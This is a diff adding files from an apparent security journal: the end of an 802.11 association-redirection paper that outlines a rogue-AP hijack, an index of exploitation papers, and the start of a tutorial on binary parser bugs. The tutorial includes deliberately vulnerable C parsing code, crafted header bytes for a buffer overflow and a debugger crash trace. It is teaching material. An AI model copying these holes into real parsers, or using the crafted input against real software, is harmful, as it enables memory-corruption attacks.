author's hope that after reading this paper the reader will not only
|
||||
understand the specific technique outlined below, but will consider protocol
|
||||
quirks with a new perspective in the future.
|
||||
|
||||
|
||||
2) Background
|
||||
|
||||
The IEEE 802.11 specification defines a hierarchy of three states a client can
|
||||
be in. When a client wishes to connect to an Access Point (AP) he progresses
|
||||
from state 1 to 2 to 3. The client progresses initially from state 1 to state 2
|
||||
by successfully authenticating (this authentication stage happens even when
|
||||
there is no security enabled). Similarly the client progresses from state 2 to
|
||||
3 by associating. Once a client has associated he enters state 3 and can
|
||||
transmit data using the AP.
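The three-state progression described above can be sketched as a small transition table. This is a minimal illustration, not an implementation of the 802.11 MAC: the event names are invented for the sketch, and the backward transitions (deauthentication and disassociation) are not discussed in the text and are included here as an assumption drawn from the standard's state diagram.

```python
from enum import IntEnum


class ClientState(IntEnum):
    UNAUTHENTICATED = 1   # state 1: not authenticated, not associated
    AUTHENTICATED = 2     # state 2: authenticated, not associated
    ASSOCIATED = 3        # state 3: authenticated and associated


# (current state, event) -> next state; event names are illustrative only.
TRANSITIONS = {
    (ClientState.UNAUTHENTICATED, "auth_ok"): ClientState.AUTHENTICATED,
    (ClientState.AUTHENTICATED, "assoc_ok"): ClientState.ASSOCIATED,
    (ClientState.ASSOCIATED, "disassoc"): ClientState.AUTHENTICATED,
    (ClientState.AUTHENTICATED, "deauth"): ClientState.UNAUTHENTICATED,
    (ClientState.ASSOCIATED, "deauth"): ClientState.UNAUTHENTICATED,
}


def next_state(state, event):
    """Return the state after `event`; unknown events leave the state unchanged."""
    return TRANSITIONS.get((state, event), state)


def can_send_data(state):
    """Only a client in state 3 may transmit data through the AP."""
    return state == ClientState.ASSOCIATED
```

A client cannot skip a state in this model: an "assoc_ok" event received in state 1 is simply ignored.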
|
||||
|
||||
|
||||
Unlike ethernet, 802.3, or other link layer headers, 802.11 headers contain at
|
||||
least 3 addresses: source, destination, and Basic Service Set ID (BSSID). The
|
||||
BSSID can be best thought of as a through field. Packets destined for the AP's
|
||||
interface have both destination and BSSID set to the same value. A packet
|
||||
destined to a different host on the same WLAN however would have the BSSID set
|
||||
to the AP and the destination set to the host.
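The role of the three addresses can be shown with a simplified record. This sketch deliberately ignores how a real 802.11 header orders its address fields; the class and function names are hypothetical, and the client addresses are made up for the example.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class FrameAddresses:
    source: str
    destination: str
    bssid: str


def is_for_ap_itself(frame):
    """True when the frame is addressed to the AP's own interface."""
    return frame.destination == frame.bssid


ap = "00:11:22:33:44:55"
# A frame for the AP's interface: destination and BSSID match.
to_ap = FrameAddresses(source="00:aa:aa:aa:aa:01", destination=ap, bssid=ap)
# A frame for another host on the same WLAN: it only passes through the AP.
to_peer = FrameAddresses(source="00:aa:aa:aa:aa:01",
                         destination="00:aa:aa:aa:aa:02", bssid=ap)
```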
|
||||
|
||||
|
||||
The state transition diagram in the standard dictates that if a client receives
|
||||
an association response with a different BSSID than the BSSID that it was
|
||||
associating with, then the client should associate to the new BSSID. The
|
||||
technique of sending an association response with a different BSSID in the
|
||||
header is known as association redirection. While the motivation for this
|
||||
idiosyncrasy is unclear, it can be leveraged to dynamically create what has
|
||||
been described as a personal virtual bridged LAN (PVLAN).
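From the client's point of view, the behavior described above amounts to a single comparison. The helper below is a hypothetical sketch of that rule, not driver code; as the experiment later in the paper shows, real cards differ in whether they follow it.

```python
def bssid_after_association(requested_bssid, response_bssid):
    """Return (bssid_to_use, redirected) for a received association response."""
    requested = requested_bssid.lower()
    response = response_bssid.lower()
    # The client adopts whatever BSSID the response carries; it counts as a
    # redirect when that differs from the BSSID the request was sent to.
    return response, response != requested
```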
|
||||
|
||||
|
||||
3) Introduction
|
||||
|
||||
The most compelling reason to virtualize APs has been security. There are
|
||||
currently two possible techniques for doing this, though only one has been
|
||||
deployed in the wild. The most prevalent has been implemented by Colubris in
|
||||
their virtual access point technology.
|
||||
|
||||
|
||||
The other technique, public access point (PAP) and personal virtual bridged
|
||||
LANs (PVLANs), which is described in this paper, has been documented in U.S.
|
||||
patent no. 20040141617.
|
||||
|
||||
|
||||
3.1) The state of the art
|
||||
|
||||
The Colubris virtual access point technology is a single physical device that
|
||||
implements an entirely independent 802.11 MAC protocol layer (including a
|
||||
unique BSSID) for each virtual AP. The only thing shared between the individual
|
||||
virtual APs is the hardware they are running on. The device goes so far as to
|
||||
implement virtual Management Information Bases (MIBs) for each virtual AP. The
|
||||
Colubris solution fits well into a heavily managed static environment where the
|
||||
users and the groups they belong to are well defined. Deploying it requires
|
||||
that each user knows which SSID to associate with a priori, along with any
|
||||
required authentication credentials. The device is capable of
|
||||
mapping virtual access points into 802.1q VLANs.
|
||||
|
||||
|
||||
The public AP solution fits well into less managed networks. Public AP
|
||||
utilizes the technique outlined in this paper. The Public AP broadcasts a
|
||||
single beacon for a Public Access Point (PAP). When a client attempts to
|
||||
associate, the PAP redirects him to a dynamically generated VBSSID, placing him
|
||||
on his own PVLAN. This is well suited to a typical hotspot scenario where there
|
||||
is no implicit trust between users, and the number of clients is not known
|
||||
beforehand. This technique could also be used in conjunction with traditional
|
||||
802.1q VLANs, however its strength lies in the lower burden of administrative
|
||||
requirements. This technique is designed to work well when deployed in the
|
||||
common hot spot scenario where the administrators have little other network
|
||||
infrastructure and the only thing upstream is a best effort common carrier
|
||||
provider.
|
||||
|
||||
|
||||
4) PVLANs and virtual BSSIDs
|
||||
|
||||
PVLANs are called personal virtual bridged LANs because the VLAN is created
|
||||
dynamically for the client. The client essentially owns the VLAN since he
|
||||
controls its creation and its lifetime. In the most common scenario there
|
||||
would only be a single client per PVLAN.
|
||||
|
||||
|
||||
An access point that implements the PAP concept intentionally re-directs
|
||||
associating clients to their own dynamically generated BSSID (Virtual BSSID or
|
||||
VBSSID).
|
||||
|
||||
|
||||
In the example below the AP is broadcasting a public BSSID of 00:11:22:33:44:55
|
||||
and is redirecting the client to his own VBSSID 00:22:22:22:22:22.
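On the AP side, the bookkeeping for per-client VBSSIDs might look like the following sketch. The paper does not say how a PAP chooses its VBSSIDs, so the random, locally administered address used here is purely an assumption, as are the class and method names.

```python
import secrets


class PublicAccessPoint:
    """Hands each associating client its own virtual BSSID (VBSSID)."""

    def __init__(self, public_bssid):
        self.public_bssid = public_bssid.lower()
        self.vbssid_by_client = {}

    def _new_vbssid(self):
        # Assumption: pick a random unicast, locally administered address.
        while True:
            octets = bytearray(secrets.token_bytes(6))
            octets[0] = (octets[0] | 0x02) & 0xFE   # set local bit, clear multicast bit
            candidate = ":".join("%02x" % b for b in octets)
            in_use = candidate in self.vbssid_by_client.values()
            if candidate != self.public_bssid and not in_use:
                return candidate

    def redirect(self, client_mac):
        """Return the BSSID to place in this client's association response."""
        client = client_mac.lower()
        if client not in self.vbssid_by_client:
            self.vbssid_by_client[client] = self._new_vbssid()
        return self.vbssid_by_client[client]
```

Each client is mapped to exactly one VBSSID for as long as its entry exists, which matches the common case of a single client per PVLAN.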
|
||||
|
||||
|
||||
5) The Experiment
|
||||
|
||||
The experiment conducted was not a full-blown implementation of a PAP. The
|
||||
experiment was designed to test a wide variety of chipsets, cards, and drivers
|
||||
for compatibility with the standard and susceptibility to association
|
||||
re-direction. To this end all the cards were subjected to every reasonable
|
||||
interpretation of the standard.
|
||||
|
||||
|
||||
The experiment was conducted by making some simple changes to the host-ap
|
||||
driver on Linux. Host-ap can operate in Access Point mode as well as in client
|
||||
mode. All the modifications were made in Access Point mode. Host-ap's
|
||||
client-side performance is unrelated to the changes made for the experiment.
|
||||
|
||||
|
||||
The experiment was conducted in two phases. First, host-ap was modified to
|
||||
mangle all management frames by modifying the source, the BSSID, or both source and BSSID
|
||||
(at the same time). The results of this are reflected in table one.
|
||||
|
||||
After this was complete, host-ap was modified to return authentication replies
|
||||
un-mangled. This was due to the number of cards that simply ignored mangled
|
||||
authentication replies. These results are cataloged in table two.
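The two phases can be summarized as one rewriting rule applied to frames the AP sends. This is a sketch of the idea only and is not taken from the modified host-ap driver; the frame subtype names, the MgmtFrame record, and the mangle function are all hypothetical.

```python
from dataclasses import dataclass, replace


@dataclass(frozen=True)
class MgmtFrame:
    subtype: str   # e.g. "auth_resp" or "assoc_resp" (names are illustrative)
    source: str
    bssid: str


MODES = ("source", "bssid", "both")


def mangle(frame, mode, vbssid, phase):
    """Rewrite the address fields of an AP-originated management frame."""
    if mode not in MODES:
        raise ValueError("unknown mode: %r" % (mode,))
    if phase == 2 and frame.subtype == "auth_resp":
        return frame   # phase two: authentication replies go out un-mangled
    changes = {}
    if mode in ("source", "both"):
        changes["source"] = vbssid
    if mode in ("bssid", "both"):
        changes["bssid"] = vbssid
    return replace(frame, **changes)
```

With phase set to 1 every management frame is rewritten; with phase set to 2 the first rewritten frame a client sees is the association response.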
|
||||
|
||||
|
||||
5.1) The Results
|
||||
|
||||
The responses in table one varied all the way from never leaving stage 1 to
|
||||
successful redirection. The most interesting cases are the drivers that
|
||||
successfully made it to stage 3. There are three cases of this. The cases
|
||||
marked ORIGINALBSSID are what was initially expected from many devices, that
|
||||
they would simply ignore the redirect request and continue to transmit on the
|
||||
PAP BSSID. The REDIRECTREASSOC case is a successful redirection with a small
|
||||
twist. The card transmits all data to VBSSID, however it periodically sends
|
||||
out reassociation requests to the PAP BSSID.
|
||||
|
||||
The SCHIZO case is the other case that made it into stage 3. In this case the
|
||||
card is listening on the PAP BSSID and then proceeds to transmit on the VBSSID.
|
||||
The device seems to ignore any data transmitted to it on the VBSSID.
|
||||
|
||||
|
||||
As mentioned previously, in table two the possibility of ignoring authentication
|
||||
replies has been eliminated by not mangling fields until the association
|
||||
request. This opened up the possibility for some interesting responses.
|
||||
|
||||
The Apple AirPort Extreme card responded with a flood of deauthentication
|
||||
packets to the null BSSID with a destination of the AP (DEAUTHFLOOD). The
|
||||
Atheros card is the only other card that sent a deauth, though it had a much
|
||||
more measured response, sending a single de-auth to the original BSSID
|
||||
(SIMPLEDEAUTHSTA).
|
||||
|
||||
The other new response in table 2 is the DUALBSSID behavior. These cards seem
|
||||
to alternate intentionally between both BSSIDs on every other transmitted
|
||||
packet. It is unknown whether they continue to do this for the entire
|
||||
connection or if this is some sort of intentional behavior and they will choose
|
||||
whichever BSSID they receive data on first.
|
||||
|
||||
The experiment provided some very surprising results. Originally it was
|
||||
suspected that many cards would simply never enter stage 3, or alternately just
|
||||
use the original BSSID they set out to. Quite a few cards can be convinced to
|
||||
go into dual BSSID behavior and might be susceptible to association
|
||||
redirection. Two drivers for the Hermes chipset were successfully redirected.
|
||||
|
||||
|
||||
6) Future Work
|
||||
|
||||
Clearly modifying client side drivers for better standards compliance is one
|
||||
area where work could be done. A more interesting question: how does one handle key
|
||||
management on the AP in this situation? Clearly any PSK solutions don't really
|
||||
apply in this scenario. How much deviation from the spec needs to happen for
|
||||
WPA 802.1x authentication to successfully be deployed? One interesting area of
|
||||
research is the concept of a stealthy rogue AP.
|
||||
|
||||
|
||||
By using association redirection clients could be the victim of stealthy (from
|
||||
the perspective of the network admin) association hijacking from a rogue AP. An
|
||||
adversary could just set up shop with a modified host-ap driver on a Linux box
|
||||
that didn't transmit beacons. Rather it would wait for a client to attempt an
|
||||
association request with the legitimate access point and try to win a race
|
||||
condition to see who could send an association reply first. Alternately the
|
||||
adversary could simply de-authenticate the user and then be poised to win the
|
||||
race.
|
||||
|
||||
|
||||
Another interesting question is whether or not a PAP could withstand a DoS
|
||||
attack attempting to create an overwhelming number of VBSSIDs. It is the
|
||||
author's opinion that a suitable algorithm could be found to make the resources
|
||||
required for the attack too costly for most. By dynamically expiring PVLANs and
|
||||
VBSSIDs as a function of time and traffic the PAP could burden the attacker
|
||||
with keeping track of all his VBSSIDs as well, instead of just creating as many
|
||||
as he can and forgetting about them.
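One way to picture expiry as a function of time and traffic is an idle timer per VBSSID. The paper does not specify an algorithm, so the table below is only a sketch under that assumption; the class name, the 30 second default, and the injectable clock are all choices made for the example.

```python
import time


class VbssidTable:
    """Tracks VBSSIDs and drops those that have been idle for too long."""

    def __init__(self, idle_timeout=30.0, clock=time.monotonic):
        self.idle_timeout = idle_timeout
        self.clock = clock          # injectable so the logic can be tested
        self.last_seen = {}

    def touch(self, vbssid):
        """Record creation of, or traffic on, a VBSSID."""
        self.last_seen[vbssid] = self.clock()

    def expire(self):
        """Remove idle entries and return the VBSSIDs that were dropped."""
        now = self.clock()
        stale = [v for v, seen in self.last_seen.items()
                 if now - seen > self.idle_timeout]
        for v in stale:
            del self.last_seen[v]
        return stale
```

Under this scheme an attacker who creates VBSSIDs and then abandons them loses them after the timeout, so keeping many alive requires generating ongoing traffic for each one.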
|
||||
|
||||
|
||||
7) Conclusion
|
||||
|
||||
It is unlikely that this technique could be successfully deployed to create
|
||||
PVLANs in a general scenario due to varied behavior from the vendors.
|
||||
However, it does appear that a determined attacker could encode the data
|
||||
generated from this experiment into a modified host-ap driver so that he could
|
||||
stealthily redirect traffic to himself. This would give the attacker a slight
|
||||
advantage over typical ARP poisoning attacks since he doesn't need to generate
|
||||
any suspicious ARP activity. It also has an advantage over simple rogue access
|
||||
points, as it requires no beacons which can easily be detected.
|
||||
|
||||
|
||||
8) Bibliography
|
||||
|
||||
Volpano, Dennis. United States Patent Application 20040141617 July 22, 2003
|
||||
http://appft1.uspto.gov/netahtml/PTO/search-adv.html
|
||||
|
||||
Institute of Electrical and Electronics Engineers.
|
||||
|
||||
Information technology - Telecommunications and information
|
||||
exchange between systems - Local and metropolitan area networks - Specific
|
||||
Requirements Part 11: Wireless LAN Medium Access Control (MAC) and Physical
|
||||
Layer (PHY) Specifications, IEEE Std. 802.11-1999, 1999. (pg 376)
|
||||
|
||||
|
||||
Aboba, Bernard.
|
||||
Virtual Access Points (IEEE document IEEE 802.11-03/154r1) May 22, 2003
|
||||
http://www.drizzle.com/~aboba/IEEE/11-03-154r1-I-Virtual-Access-Points.doc
|
||||
|
||||
|
||||
Colubris Networks. Virtual Access Point Technology Multiple WLAN Services
|
||||
http://www.colubris.com/literature/whitepapers.asp
|
||||
accessed Aug 09, 2005.
|
||||
|
||||
|
||||
|
||||
|
||||
|
25
uninformed/2.txt
Normal file
|
@ -0,0 +1,25 @@
|
|||
|
||||
|
||||
Engineering in Reverse
|
||||
Inside Blizzard: Battle.net
|
||||
Skywing
|
||||
This paper intends to describe a variety of the problems Blizzard Entertainment has encountered from a practical standpoint through their implementation of the large-scale online game matchmaking and chat service, Battle.net. The paper provides some background historical information into the design and purpose of Battle.net and continues on to discuss a variety of flaws that have been observed in the implementation of the system. Readers should come away with a better understanding of problems that can be easily introduced in designing a matchmaking/chat system to operate on such a large scale in addition to some of the serious security-related consequences of not performing proper parameter validation of untrusted clients.
|
||||
html | pdf | txt
|
||||
|
||||
Exploitation Technology
|
||||
Temporal Return Addresses
|
||||
skape
|
||||
Nearly all existing exploitation vectors depend on some knowledge of a process' address space prior to an attack in order to gain meaningful control of execution flow. In cases where this is necessary, exploit authors generally make use of static addresses that may or may not be portable between various operating system and application revisions. This fact can make exploits unreliable depending on how well researched the static addresses were at the time that the exploit was implemented. In some cases, though, it may be possible to predict and make use of certain addresses in memory that do not have static contents. This document introduces the concept of temporal addresses and describes how they can be used, under certain circumstances, to make exploitation more reliable.
|
||||
html | pdf | txt | code.tgz
|
||||
|
||||
Bypassing Windows Hardware-enforced DEP
|
||||
skape & Skywing
|
||||
This paper describes a technique that can be used to bypass Windows hardware-enforced Data Execution Prevention (DEP) on default installations of Windows XP Service Pack 2 and Windows 2003 Server Service Pack 1. This technique makes it possible to execute code from regions that are typically non-executable when hardware support is present, such as thread stacks and process heaps. While other techniques have been used to accomplish similar feats, such as returning into NtProtectVirtualMemory, this approach requires no direct reprotecting of memory regions, no copying of arbitrary code to other locations, and does not have issues with NULL bytes. The result is a feasible approach that can be used to easily bypass the enhancements offered by hardware-enforced DEP on Windows in a way that requires very minimal modifications to existing exploits.
|
||||
html | pdf | txt
|
||||
|
||||
General Research
|
||||
802.11 VLANs and Association Redirection
|
||||
Johnny Cache
|
||||
The goal of this paper is to introduce the reader to a technique that could be used to implement something analogous to VLANs found in wired media into a typical IEEE 802.11 environment. What makes this technique interesting is that it can be accomplished without breaking the IEEE 802.11 standard on the client side, and requires only minor changes made to the Access Point (AP). No modifications are made to the 802.11 MAC. It is the author's hope that after reading the paper the reader will not only understand the specific technique outlined below, but will consider protocol specifications with a new perspective in the future.
|
||||
html | pdf | txt
|
||||
|
2069
uninformed/3.1.txt
Normal file
File diff suppressed because it is too large
1490
uninformed/3.2.txt
Normal file
File diff suppressed because it is too large
599
uninformed/3.3.txt
Normal file
|
@ -0,0 +1,599 @@
|
|||
Analyzing Common Binary Parser Mistakes
|
||||
Orlando Padilla
|
||||
xbud@g0thead.com
|
||||
Last modified: 12/05/2005
|
||||
|
||||
Abstract: With just about one file format bug being
|
||||
consistently released on a weekly basis over the past six to twelve
|
||||
months, one can only hope developers would look and learn. The
|
||||
reality of it all is unfortunate; no one cares enough. These bugs
|
||||
have been around for some time now, but have only recently gained
|
||||
media attention due to the large number of vulnerabilities being
|
||||
released. Researchers have been finding more elaborate and passive
|
||||
attack vectors for these bugs, some of which can even leverage a
|
||||
remote compromise.
|
||||
|
||||
No new attacks will be presented in this document; instead, examples and
|
||||
an example file format will be presented to demonstrate an insecure
|
||||
implementation of a parsing library. As a bonus for reading this
|
||||
article, an undisclosed bug in a popular debugger will be released
|
||||
during the case study material of this paper. This vulnerability,
|
||||
if leveraged properly, will cause the debugger to crash during the
|
||||
loading of a binary executable or dynamic library.
|
||||
|
||||
Disclaimer: This document is written with an educational
|
||||
interest and I cannot be held liable for any outcome of the
|
||||
information being released.
|
||||
|
||||
|
||||
Thanks: #vax, nologin, and jimmy haffa
|
||||
|
||||
= Introduction
|
||||
|
||||
|
||||
A number of papers have already been written describing the
|
||||
exploitation of integer overflows, however, very few publications
|
||||
have been aimed at the exploitation of integer overflows within
|
||||
binary parsers. The current slew of advisories released by iDefense
|
||||
(ClamAV, Adobe Acrobat), eEye (Macromedia, Windows Metafile) and
|
||||
Alex Wheeler via Rem0te.com (Multiple AV Vendors) on file format
|
||||
bugs should be enough to take these bugs seriously.
|
||||
|
||||
|
||||
The most common mistake made by a programmer is in trusting a
|
||||
field inside a binary structure that should not be trusted. During
|
||||
the design phase, efficiency, simplicity and the secure
|
||||
implementation of a particular project should be at the top of the
|
||||
priority list. When dealing with data that cannot be presented only
|
||||
as strings, a length field is required to tell the application when
|
||||
to stop reading. When dealing with sections that must have
|
||||
subsections, knowing ahead of time how many sections are embedded
|
||||
within the primary section of a structure is required and again, a
|
||||
value must be used to instruct the application only to iterate
|
||||
x number of times. In the following paragraphs, the
|
||||
description of a binary file structure will be presented, followed
|
||||
by applied examples of typical coding errors encountered when
|
||||
auditing applications. An overview of integer overflows will be
|
||||
discussed for the sake of completeness. Finally, a case study of
|
||||
several bugs found during the research of a particular file format
|
||||
will be shown.
|
||||
|
||||
= Certificate Storage File
|
||||
|
||||
|
||||
The following file format was designed and written specifically for
|
||||
this article and has no real world applicable use. The general idea
|
||||
behind the implementation of this file format is to create a single
|
||||
binary file acting as a searchable database for certificate files.
|
||||
The file will consist of two core structures, which will hold the
|
||||
information necessary to parse the certificates in DER format. This
|
||||
is a rough diagram of what the file looks like after compilation:
|
||||
|
||||
+----------------------+-----------+---------+
| Structure            | Offset    | Size    |
+----------------------+-----------+---------+
| OP Header            | 0         | 4       |
| Element Count        | 4         | 2       |
| Cert File Fmt Struct | 6         | 6       |
| Cert Data Struct     | 12        | 16      |
| Cert 1               |           |         |
| Cert 2               |           |         |
| Cert ...             |           |         |
| Cert n               |           |         |
+----------------------+-----------+---------+
|
||||
|
||||
|
||||
= Binary Layout
|
||||
|
||||
|
||||
|
||||
The following structures are defined in the file format's compiler
|
||||
library.
|
||||
|
||||
|
||||
typedef struct _CERTFF
|
||||
{
|
||||
unsigned int NumberOfCerts;
|
||||
unsigned short PointerToCerts;
|
||||
}CERTFF,*PCERTFF;
|
||||
|
||||
typedef struct _CERTDATA
|
||||
{
|
||||
char Name[8];
|
||||
unsigned short CertificateLen;
|
||||
unsigned short PointerToDERs;
|
||||
unsigned char *DataPtr;
|
||||
}CERTDATA,*PCERTDATA;
|
||||
|
||||
|
||||
The first data structure consists of two unsigned integers, (int)
NumberOfCerts and (short) PointerToCerts. These hold the total number
of certificates stored in this binary (NumberOfCerts) and the
offset from the beginning of the file to the first certificate data
structure, CERTDATA (PointerToCerts). We can already assume that a
|
||||
parser will iterate through the image file NumberOfCerts times,
|
||||
starting from PointerToCerts in chunks of the size of CERTDATA at a
|
||||
time. The second data structure consists of a character array 8
|
||||
bytes in size, which is used to hold the first 7 characters of a
|
||||
certificate's description, followed by two unsigned short integers
|
||||
which hold the length of the certificate referred to by this
|
||||
structure, and the offset to the beginning of the certificate
|
||||
respectively. The last element is an unsigned char pointer, which is used
|
||||
to carry the body of the certificate by the compiler.
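
The layout described above can also be read field by field instead of
casting the file buffer to a struct, which avoids depending on compiler
padding and host byte order. The following is a minimal sketch, assuming
little-endian fields and the offsets from the table above. The names
rd16, rd32, CERTFF_VIEW and parse_certff are hypothetical and are not
part of the library that accompanies this article.

```c
#include <stddef.h>
#include <stdint.h>

/* Offsets taken from the layout table: 4-byte signature, 2-byte element
 * count, then the 6-byte CERTFF structure. */
#define CERTFF_OFFSET 6u
#define CERTFF_SIZE   6u

/* Hypothetical decoded view of CERTFF; not the article's own type. */
typedef struct {
    uint32_t number_of_certs;
    uint16_t pointer_to_certs;
} CERTFF_VIEW;

/* Read a little-endian 16-bit value byte by byte. */
static uint16_t rd16(const unsigned char *p)
{
    return (uint16_t)(p[0] | (p[1] << 8));
}

/* Read a little-endian 32-bit value byte by byte. */
static uint32_t rd32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Returns 0 on success, -1 if the file is too small to hold the header. */
static int parse_certff(const unsigned char *image, size_t size,
                        CERTFF_VIEW *out)
{
    if (size < CERTFF_OFFSET + CERTFF_SIZE)
        return -1;
    out->number_of_certs  = rd32(image + CERTFF_OFFSET);
    out->pointer_to_certs = rd16(image + CERTFF_OFFSET + 4);
    return 0;
}
```

Decoding only tells the parser what the file claims. The values returned
here still have to be checked against the real file size before they are
used as loop counts or offsets.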
|
||||
|
||||
= Applied Examples
|
||||
|
||||
|
||||
As the number of buffer overflows decreases, the number of integer
|
||||
overflows and improper file and binary protocol parsing bugs
|
||||
increases. The following URL query to the OSVDB (Open Source
Vulnerability Database) for integer overflows is a perfect example
|
||||
of the diversity of applications affected. The list is rather short
|
||||
considering the number of vulnerabilities actually released in the
|
||||
past two to three years. Still, it accurately displays different
|
||||
levels of severity: Kernel, Library, Protocol and file format bugs.
|
||||
|
||||
http://osvdb.org/searchdb.php?action=search_title&vuln_title=integer+overflow&Search=Search
|
||||
|
||||
|
||||
As a proof of concept, I developed a parsing library for the
|
||||
construct above. See Appendix A for code. The code functionality
|
||||
is simple. As explained above it consolidates certificates (in this
|
||||
example) into a single file. There are several bugs in the library
|
||||
that I modeled on actual implementations of different open source
|
||||
and closed source applications. The first vulnerability exists in
|
||||
the single cert extraction tool 'certextract.c'. The issue is
|
||||
pretty obvious; the library trusts that the file being parsed has
|
||||
not been tampered with. The following code snippet highlights the
|
||||
issue:
|
||||
|
||||
|
||||
unsigned char cert_out[MAX_CERT_SIZE];
unsigned char *extract_cert = "req1.DER";
...
pCertData = (PCERTDATA)(image + get_cert(image,extract_cert));

memcpy(cert_out,(image + pCertData->PointerToDERs), pCertData->CertificateLen);
|
||||
...
|
||||
|
||||
|
||||
The vulnerability exists because the library assumes the certificates
|
||||
will not be larger than MAX_CERT_SIZE due to the compiler's
|
||||
inability to take files larger than the set size. All an attacker has
to do is modify the file using an external editor, or reverse engineer
the file format and create a malicious certificate db. A step-by-step
|
||||
example on exploitation of this bug is out of the scope of this
|
||||
document, but let's look at what has to be done to prepare an exploit
|
||||
for this vulnerability.
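
For contrast, the missing validation can be sketched as follows. This is
only an illustration under stated assumptions, not the safer library
shipped with this article: extract_cert_checked is a hypothetical name,
the header fields are passed in already decoded, and MAX_CERT_SIZE uses
the 2048 byte value from 'certlib.h'.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define MAX_CERT_SIZE 2048u  /* value the article gives for certlib.h */

/* Hypothetical helper: copy one certificate body out of the image after
 * validating both header fields against the real file size and the
 * destination size. Returns the number of bytes copied, or -1 if the
 * header cannot be trusted. */
static long extract_cert_checked(const unsigned char *image, size_t image_size,
                                 uint16_t pointer_to_ders,
                                 uint16_t certificate_len,
                                 unsigned char *cert_out, size_t out_size)
{
    if (certificate_len > out_size)
        return -1;                  /* would overflow cert_out */
    if (pointer_to_ders > image_size)
        return -1;                  /* offset lies outside the file */
    if (certificate_len > image_size - pointer_to_ders)
        return -1;                  /* body runs past the end of the file */
    memcpy(cert_out, image + pointer_to_ders, certificate_len);
    return (long)certificate_len;
}
```

The subtraction in the third test is safe because the second test has
already established that pointer_to_ders does not exceed image_size.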
|
||||
|
||||
|
||||
We already know we have to modify the length field to something
|
||||
larger than MAX_CERT_SIZE or if we look specifically at
|
||||
'certlib.h', larger than 2048 bytes. Looking at the structure of
|
||||
the headers, we can see that each certificate has its own length
|
||||
field. So creating a valid structure header and placing it at a
|
||||
correct offset along with a corresponding payload should do the
|
||||
trick. With this in mind, calculate the number of bytes from the
|
||||
beginning of the file to the first certificate.
|
||||
|
||||
|
||||
[SIG 4 bytes][Element Count 2 bytes][First Struct 6 bytes][Our Fake Cert Struct]
|
||||
|
||||
|
||||
It seems we can drop our fake structure after the 12th byte. The
|
||||
cert structure will look something like the following (depending on
|
||||
the size of the payload you are using):
|
||||
|
||||
|
||||
unsigned char exploit_dat1[] = {
|
||||
|
||||
/* Name of our fake cert */
|
||||
0x72, 0x65, 0x71, 0x31, 0x2e, 0x44, 0x45, 0x00,
|
||||
/* our length */
|
||||
0x53, 0x08,
|
||||
/* where we can write our data, PointerToDer*/
|
||||
0x18, 0x00,
|
||||
/* DataPtr just for completion */
|
||||
0x00, 0x00, 0x00, 0x00
|
||||
};
|
||||
|
||||
|
||||
Notice the length is an unsigned short integer that limits our payload
|
||||
to 0xFFFF (65535), which should be more than enough space. The
|
||||
two most important sections of our structure are the length, and the value
|
||||
we give PointerToDer since this will point to the beginning of our
|
||||
payload. Since we are choosing to make our fake certificate the first
|
||||
one on the list, anything below it can be overwritten with little
|
||||
concern. At offset 0x18 of the dat file we have 0x0853
bytes of A's. Notice there is no bounds check on this value. Below is a
|
||||
sample run of a valid certsdb.dat file and a second sample run with our
|
||||
malicious dat file.
|
||||
|
||||
|
||||
(xbud@yakuza <~/code/random>) $./certextract certsdb.dat out.DER
|
||||
cert req1.DE
|
||||
len: 657 PtrToData: 90
|
||||
|
||||
(xbud@yakuza <~/code/random>) $md5sum req1.DER out.DER
|
||||
e3e45e30b18a6fc9f6134f0297485cc1 req1.DER
|
||||
e3e45e30b18a6fc9f6134f0297485cc1 out.DER
|
||||
|
||||
(gdb) r ./badcertdb.dat out.DER
|
||||
Starting program: /home/xbud/code/random/certextract ./badcertdb.dat out.DER
|
||||
cert req1.DE
|
||||
len: 2131 PtrToData: 27
|
||||
|
||||
Program received signal SIGSEGV, Segmentation fault.
|
||||
0x41414141 in ?? ()
|
||||
|
||||
|
||||
The actual exploitation of this vulnerability is left as an exercise
for the reader. Given the file structure necessary to build the attack,
it is now trivial to complete.
|
||||
|
||||
= Continuing Applied Examples
|
||||
|
||||
|
||||
The utility 'certdb2der.c' provided in this example suite iterates
|
||||
through the dat file and dumps the contents of each certificate into
|
||||
individual files. The CERTFF (Certificate File Format) structure
|
||||
contains an element called NumberOfCerts of type unsigned int. This
|
||||
integer explicitly controls the loop iterator, controlling the number
|
||||
of CERTDATA structures said to be in the body of the dat file.
|
||||
|
||||
|
||||
59 pCertFF = (PCERTFF)(image + OFFSET_TO_CERT_COUNT);
|
||||
60 alloc_size = (pCertFF->NumberOfCerts + 1) * sizeof(CERTDATA);
|
||||
61
|
||||
62 pCertData = (PCERTDATA)malloc(alloc_size);
|
||||
63
|
||||
64 memcpy(pCertData,(image + pCertFF->PointerToCerts),alloc_size - 1);
|
||||
|
||||
|
||||
An integer overflow condition may be triggered during memory allocation
for the 'pCertData' array of structures. If a specially crafted dat
file contains a high enough value in NumberOfCerts, the size computed
for the pCertData array is rendered incorrect by the arithmetic in
line 60, (pCertFF->NumberOfCerts + 1) * sizeof(CERTDATA).
The maximum value for an unsigned integer is 4294967295 or
0xffffffff, so when the value at NumberOfCerts plus one is multiplied
by sizeof(CERTDATA), or 16 bytes, an overflow occurs, causing the value
to wrap and resulting in an undersized malloc() or a malloc(0).
|
||||
This could then be leveraged into executing arbitrary code on certain
|
||||
malloc implementations by overwriting control structures in the heap.
|
||||
Again, exploitation is not covered in detail, but pre-exploitation is
|
||||
explained below. Please refer to the references section for papers
|
||||
covering heap overflow exploitation.
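
The wrap described above can be reproduced with fixed-width arithmetic.
The sketch below assumes a 32-bit unsigned int and the 16 byte
sizeof(CERTDATA) quoted above. Both function names are hypothetical, and
the checked variant is only one possible way to reject such a header.

```c
#include <stddef.h>
#include <stdint.h>

#define CERTDATA_SIZE 16u  /* sizeof(CERTDATA) as stated in the article */

/* What line 60 computes when unsigned int is 32 bits wide. */
static uint32_t alloc_size_unchecked(uint32_t number_of_certs)
{
    return (uint32_t)((number_of_certs + 1u) * CERTDATA_SIZE);
}

/* Hypothetical checked variant: returns 0 and stores the size on success,
 * -1 if either the addition or the multiplication would wrap. */
static int alloc_size_checked(uint32_t number_of_certs, uint32_t *out)
{
    if (number_of_certs == UINT32_MAX)
        return -1;                              /* +1 would wrap to 0 */
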